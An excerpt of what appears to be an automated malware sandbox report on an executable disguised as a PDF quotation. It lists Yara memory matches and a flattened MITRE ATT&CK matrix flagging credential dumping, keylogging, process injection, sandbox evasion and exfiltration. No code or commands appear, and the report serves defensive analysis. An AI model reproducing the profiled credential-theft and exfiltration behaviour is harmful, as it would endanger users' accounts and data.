                    Source: Yara matchFile source: 00000004.00000000.272600476.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.273276153.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.273651203.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.272994936.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.276792797.0000000003E85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.496206298.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Quotation-pdf______________________________________.exe PID: 4400, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Quotation-pdf______________________________________.exe PID: 5224, type: MEMORYSTR
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts211
                    Windows Management Instrumentation
                    Path Interception111
                    Process Injection
                    1
                    Masquerading
                    2
                    OS Credential Dumping
                    111
                    Security Software Discovery
                    Remote Services1
                    Email Collection
                    Exfiltration Over Other Network Medium1
                    Web Service
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                    Disable or Modify Tools
                    1
                    Input Capture
                    1
                    Process Discovery
                    Remote Desktop Protocol1
                    Input Capture
                    Exfiltration Over Bluetooth11
                    Encrypted Channel
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)131
                    Virtualization/Sandbox Evasion
                    1
                    Credentials in Registry
                    131
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin Shares11
                    Archive Collected Data
                    Automated Exfiltration1
                    Ingress Tool Transfer
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                    Process Injection
                    NTDS1
                    Application Window Discovery
                    Distributed Component Object Model2
                    Data from Local System
                    Scheduled Transfer3
                    Non-Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information
                    LSA Secrets1
                    Remote System Discovery
                    SSHKeyloggingData Transfer Size Limits4
                    Application Layer Protocol
                    Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    Obfuscated Files or Information
                    Cached Domain Credentials114
                    System Information Discovery
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items11
                    Software Packing
                    DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                    Timestomp
                    Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.